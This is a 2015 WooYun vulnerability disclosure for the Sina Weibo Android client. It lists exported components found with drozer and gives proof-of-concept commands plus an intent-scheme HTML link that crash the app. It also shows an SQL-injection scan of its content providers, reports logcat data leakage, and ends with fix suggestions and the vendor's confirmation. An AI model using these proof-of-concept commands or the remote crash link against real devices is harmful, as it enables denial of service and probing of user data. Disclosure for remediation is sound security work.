新浪微博Android客户端漏洞打包（设计缺陷/拒绝服务/敏感信息泄露/SQL注入）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120198

漏洞标题：新浪微博Android客户端漏洞打包（设计缺陷/拒绝服务/敏感信息泄露/SQL注入）

漏洞作者：路人甲

提交时间：2015-06-15 11:29

修复时间：2015-09-15 17:22

公开时间：2015-09-15 17:22

漏洞类型：用户敏感数据泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-15：细节已通知厂商并且等待厂商处理中
2015-06-17：厂商已经确认，细节仅向厂商公开
2015-06-20：细节向第三方安全合作伙伴开放
2015-08-11：细节向核心白帽子及相关领域专家公开
2015-08-21：细节向普通白帽子公开
2015-08-31：细节向实习白帽子公开
2015-09-15：细节向公众公开

简要描述：

醉了，求打雷

详细说明：

### 客户端信息，最新版本：v5.3.0

### 设计缺陷，大量组件暴露，增加风险面，那么多组件是否都有必要exported=true？

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
  103 activities exported
  15 broadcast receivers exported
  1 content providers exported
  14 services exported
dz>

Activity：

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
  com.sina.weibo.MainTabActivity
  com.sina.weibo.composerinde.ComposerDispatchActivity
  com.sina.weibo.photoalbum.PhotoAlbumActivity
  com.sina.weibo.SwitchUser
  com.tencent.tauth.AuthActivity
  com.sina.weibo.FbBindActivity
  com.sina.weibo.UserLoginOverseaActivity
  com.sina.weibo.MessageGroupManageActivity
  com.sina.weibo.MessageAtMeActivity
  com.sina.weibo.MessageCommentActivity
  com.sina.weibo.weiyou.DMMessageBoxActivity
  com.sina.weibo.weiyouinterface.DMMessageBoxPreLoadingActivity
  com.sina.weibo.weiyouinterface.WeiyouDispatchActivity
  com.sina.weibo.HomeListActivity
  com.sina.weibo.page.SearchResultActivity
  com.sina.weibo.WeiboCommonListActivity
  com.sina.weibo.FavoriteActivity
  com.sina.weibo.page.ProfileInfoActivity
  com.sina.weibo.page.UserInfoDetailActivity
  com.sina.weibo.page.UserWeiboAttentionFansList
  com.sina.weibo.ImageViewer
  com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
  com.sina.weibo.exlibs.WeiboBrowserPreLoading
  com.sina.weibo.PayCommonForwardActivity
  com.sina.weibo.PayOrderInfoLoderActivity
  com.sina.weibo.PayOrderActivity
  com.sina.weibo.PayBankcardManageActivity
  com.sina.weibo.PayFinishedAcitivity
  com.sina.weibo.DetailWeiboActivity
  com.sina.weibo.LoadingActivity
  com.sina.weibo.LocalSearch
  com.sina.weibo.SplashActivity
  com.sina.weibo.EditorDialogActivity
  com.sina.weibo.NavigateViewPageActivity
  com.sina.weibo.NearByPeopleNavigator
  com.sina.weibo.SSOActivity
  com.sina.weibo.SSOAccountListActivity
  com.sina.weibo.ChooseContactsActivity
  com.sina.weibo.page.EditGroupActivity
  com.sina.weibo.GetFriendActivity
  com.sina.weibo.NearByActivity
  com.sina.weibo.page.ShakeActivity
  com.sina.weibo.page.EditChannelActivity
  com.sina.weibo.page.FragmentPageActivity
  com.sina.weibo.page.ChannelDetailInfoActivity
  com.sina.weibo.sync.activity.ContactsSyncActivity
  com.sina.weibo.QRCodeActivity
  com.sina.weibo.DraftBox
  com.sina.weibo.page.CardLikeListActivity
  com.sina.weibo.page.CardMblogListActivity
  com.sina.weibo.page.CardProductListActivity
  com.sina.weibo.page.CardPicListActivity
  com.sina.weibo.page.CardInfoListActivity
  com.sina.weibo.page.CardUserListActivity
  com.sina.weibo.MyThemeActivity
  com.sina.weibo.MyWeiboTailActivity
  com.sina.weibo.LuckyBagActivity
  com.sina.weibo.InstallActionActivity
  com.sina.weibo.NewRegistHomeActivity
  com.sina.weibo.NewFillInfoActivity
  com.sina.weibo.NewInterestPeopleActivity
  com.sina.weibo.qrcode.CaptureActivity
  com.sina.weibo.PageActivity
  com.sina.weibo.page.PageDetailActivity
  com.sina.weibo.PageDiscussActivity
  com.sina.weibo.page.CardListActivity
  com.sina.weibo.page.AlipayCardListActivity
  com.sina.weibo.GroupFriendGuideActivity
  com.sina.weibo.appmarketinterface.AppMarketActivityDispatcher
  com.sina.weibo.appmarket.activity.AppInfoActivity
  com.sina.weibo.appmarket.sng.activity.SngMainActivity
  com.sina.weibo.appmarket.sng.activity.SngGameDetailActivity
  com.sina.weibo.appmarket.sng.activity.SngGameManagerActivity
  com.sina.weibo.appmarket.sng.activity.SngMessageListActivity
  com.sina.weibo.appmarket.sng.activity.SngMessageDetailActivity
  com.sina.weibo.appmarket.sng.activity.SngGiftBagListActivity
  com.sina.weibo.appmarket.sng.activity.SngGameGiftBagListActivity
  com.sina.weibo.appmarket.sng.activity.SngGiftBagDetailActivity
  com.sina.weibo.appmarket.sng.activity.SngGameCategoryActivity
  com.sina.weibo.appmarket.sng.activity.SngGameWebViewActivity
  com.sina.weibo.appmarket.sng.activity.SngHtml5GameContainerActivity
  com.sina.weibo.appmarket.sng.activity.SngEgretGameActivity
  com.taobao.tae.sdk.alipaypro.AuthCallbackActivity
  com.taobao.tae.sdk.alipaypro.AuthCallbackActivityBrowser
  com.sina.weibo.FriendCircleMembersAddActivity
  com.sina.weibo.FriendRecommendActivity
  com.sina.weibo.media.player.MusicPlayerActivity
  com.sina.weibo.page.MyFollowersActivity
  com.sina.weibo.page.MyGroupFollowActivity
  com.sina.weibo.GroupChatFansGroupActivity
  com.sina.weibo.ChristmasEggActivity
  com.sina.weibo.BrowserShareActivity
  com.sina.weibo.wbc.CameraActivity
  com.sina.weibo.GroupChatChooseActivity
  com.sina.weibo.GroupChatForwardActivity
  com.sina.weibo.GroupListActivity
  com.sina.weibo.RadarActivity
  com.sina.weibo.radar.RadarMainActivity
  com.sina.weibo.radar.RadarTVActivity
  com.sina.weibo.hc.HealthHomeActivity
  com.sina.weibo.hc.HealthRankListActivity
  com.sina.weibo.hc.tracking.ShareTrackActivity
  com.sina.weibo.hc.HealthPermissionChoiceActivity

Broadcast：

dz> run app.broadcast.info -a com.sina.weibo
Package: com.sina.weibo
  Receiver: com.sina.weibo.bundlemanager.WBExportedBroadcastDeliver
  Receiver: com.sina.weibo.gowidget.GoWidgetProvider
  Receiver: com.sina.weibo.BootCompletedReceiver
  Receiver: com.alipay.mobile.command.trigger.NotifyTrigger
  Receiver: com.sina.weibo.push.SDKMsgReceiver
  Receiver: com.sina.push.receiver.ProxyReceiver
  Receiver: com.sina.weibo.push.PackageReceiver
  Receiver: com.sina.push.receiver.PushSDKReceiver
  Receiver: com.sina.weibo.sdk.internal.SdkRegisterReceiver
  Receiver: com.sina.weibo.wlan.WifiBusinessReceiver
  Receiver: com.sina.weibo.push.PushNotificationReceiver
  Receiver: com.sina.weibo.localpush.LocalPushReceiver
  Receiver: com.sina.weibo.SwitchStateReceiver
  Receiver: com.xiaomi.push.service.receivers.NetworkStatusReceiver
  Receiver: com.sina.weibo.push.mi.MIUIMessageReceiver

Service：

dz> run app.service.info -a com.sina.weibo
Package: com.sina.weibo
  com.sina.weibo.gowidget.GoWidgetProvider$GoWidgetKeepLiveService
    Permission: null
  com.sina.weibo.sendqueue.SendQueueService
    Permission: null
  com.sina.weibo.business.WeiboService
    Permission: null
  com.sina.weibo.business.DownloadManager
    Permission: null
  com.sina.weibo.business.ImageUtilService
    Permission: null
  com.sina.weibo.business.RemoteSSOService
    Permission: null
  com.sina.weibo.appmarket.service.AppMarketService
    Permission: null
  com.sina.weibo.push.PushServiceProxy
    Permission: null
  com.sina.push.service.SinaPushService
    Permission: com.sina.permission.SINA_PUSH
  com.sina.weibo.sdk.internal.SdkIdentityService
    Permission: null
  com.sina.weibo.sync.contact.ContactsSyncService
    Permission: null
  com.sina.weibo.sync.AuthenticationService
    Permission: null
  com.xiaomi.mipush.sdk.PushMessageHandler
    Permission: null
  com.sina.weibo.hc.tracking.manager.TrackingService
    Permission: null

Provider：

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
  Authority: com.sina.weibo.sdkProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.sina.weibo.datasource.SinaWeiboSdkProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

#### 向某些暴露的组件发送空的intent，导致weibo客户端Crash
暴露组件太多，只是尝试了其中一部分activity，发现多个存在问题的组件（其余的请自行排查），如下

com.sina.weibo.weiyou.DMMessageBoxActivity
com.sina.weibo com.sina.weibo.ImageViewer
com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
com.sina.weibo.exlibs.WeiboBrowserPreLoading

部分崩溃日志：

POC：

dz> run app.activity.start --component com.sina.weibo com.sina.weibo.weiyou.DMMessageBoxActivity
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.ImageViewer
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboBrowserPreLoading

或者IntentScheme远程利用：

<a href="intent:#Intent;component=cn.com.sina.weibo/com.sina.weibo.weiyou.DMMessageBoxActivity;end">触发漏洞</a><br>

#### Logcat调试信息，泄露敏感内容

#### 本地配置文件，敏感信息泄露

#### 还有一个本地SQL注入

dz> run scanner.provider.injection -a com.sina.weibo
Scanning com.sina.weibo...
Not Vulnerable:
  content://com.sina.weibo.picListProvider/query_picinfo
  content://mms-sms/conversations/
  content://telephony/apgroups/
  content://com.lenovo.launcher.badge/lenovo_badges/
  content://com.sina.weibo.picListProvider/query_status
  content://com.sina.weibo.userlog/pushinitlog/
  content://com.sina.weibo.picListProvider/query_size
  content://com.sina.weibo.userlog/netlog
  content://com.android.contacts/
  content://com.huawei.android.launcher.settings/badge/
  content://com.sina.weibo.userlog/netlog/
  content://com.android.contacts
  content://com.sina.weibo.blogProvider/
  content://com.sina.weibo.userlog/pushinitlog
  content://com.sina.weibo.userlog/
  content://com.sina.weibo.userlog
  content://com.android.launcher2.settings/favorites?notify=true/
  content://com.sina.weibo.blogProvider/home/
  content://com.android.launcher2.settings/favorites?notify=true
  content://com.sina.weibo.picListProvider/query_picinfo/
  content://com.sina.push.pushprovider.1004/
  content://com.sina.weibo.sdkProvider
  content://com.sina.weibo.picListProvider/query_status/
  content://com.lenovo.launcher.badge/lenovo_badges
  content://com.sina.weibo.picListProvider/query_size/
  content://com.sina.weibo.sdkProvider/
  content://telephony/apgroups
  content://com.sina.weibo.blogProvider/home
  content://com.huawei.android.launcher.settings/badge
  content://com.sina.weibo.picListProvider/
  content://sms/inbox/
  content://downloads/public_downloads/
  content://com.sina.weibo.picListProvider
  content://mms-sms/conversations
  content://com.sina.weibo.spProvider
  content://com.android.launcher.settings/favorites?notify=true
  content://sms
  content://com.sina.weibo.spProvider/
  content://downloads/public_downloads
  content://com.android.launcher.settings/favorites?notify=true/
  content://sms/
  content://sms/inbox
  content://com.sina.weibo.blogProvider
  content://com.sina.push.pushprovider.1004
Injection in Projection:
  content://telephony/carriers
  content://telephony/carriers/preferapn/
  content://telephony/carriers/
  content://telephony/carriers/preferapn
Injection in Selection:
  content://telephony/carriers
  content://telephony/carriers/preferapn/
  content://telephony/carriers/
  content://telephony/carriers/preferapn

漏洞证明：

见详细说明

修复方案：

1. 那么多exported=true的组件，重新设计一下吧
2. 发布版本关闭调试输出
3. 组件应正确处理异常intent
4. SQL注入。。。
。。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2015-06-17 17:21

厂商回复：

感谢对新浪安全的支持，已通知相关业务

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120198

漏洞标题：新浪微博Android客户端漏洞打包（设计缺陷/拒绝服务/敏感信息泄露/SQL注入）

相关厂商：新浪

漏洞作者：路人甲

提交时间：2015-06-15 11:29

修复时间：2015-09-15 17:22

公开时间：2015-09-15 17:22

漏洞类型：用户敏感数据泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120198

漏洞标题：新浪微博Android客户端漏洞打包（设计缺陷/拒绝服务/敏感信息泄露/SQL注入）

相关厂商：新浪

漏洞作者： 路人甲

提交时间：2015-06-15 11:29

修复时间：2015-09-15 17:22

公开时间：2015-09-15 17:22

漏洞类型：用户敏感数据泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0120198"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云